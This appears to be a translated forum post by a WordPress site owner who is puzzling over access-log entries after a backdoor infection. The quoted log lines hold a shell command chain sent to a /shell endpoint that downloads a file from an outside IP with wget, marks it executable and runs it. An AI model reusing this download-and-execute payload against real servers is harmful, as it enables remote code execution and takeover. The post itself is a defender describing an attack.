我在我的网站上使用 Wordpress,最近我阻止了一名黑客,该黑客用大量后门(字面意思是数千个后门)感染了我的网站。我花了一个半月的时间跟他打赌。这不是我的错,在我之前担任我工作的人从未更新过该网站。
在此之后,我注意到对不存在的文件的一些奇怪的访问,我认为黑客正试图从我不使用的 WordPress 插件中找到已知的漏洞。没关系,我根本不在乎。但其中一项尝试引起了我的注意。
95.249.95.104 - - [17/Jan/2020:10:17:29 -0300] "karin***com.br" "GET /shell?cd+/tmp;rm+-rf+.j;wget+http:/\x5C/91.92.66.124/..j/.j;chmod+777+.j;sh+.j;echo+DONE HTTP/1.1" 400 552 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.100 Safari/537.36" "-"
94.200.107.2 - - [17/Jan/2020:13:52:28 -0300] "karin***com.br" "GET /shell?cd+/tmp;rm+-rf+.j;wget+http:/\x5C/91.92.66.124/..j/.j;chmod+777+.j;sh+.j;echo+DONE HTTP/1.1" 400 552 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.100 Safari/537.36" "-"
197.226.122.184 - - [17/Jan/2020:14:57:36 -0300] "karin***com.br" "GET /shell?cd+/tmp;rm+-rf+.j;wget+http:/\x5C/91.92.66.124/..j/.j;chmod+777+.j;sh+.j;echo+DONE HTTP/1.1" 400 552 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.100 Safari/537.36" "-"
我隐藏了部分网址,抱歉。
IP 始终会发生变化,即使是相差不到一秒的连续请求,也可能是 DDoS。用户代理通常也会发生变化,这里有一切:iPhone、iPad、Android、Windows 7、8、10、Firefox、Google Chrome、Internet …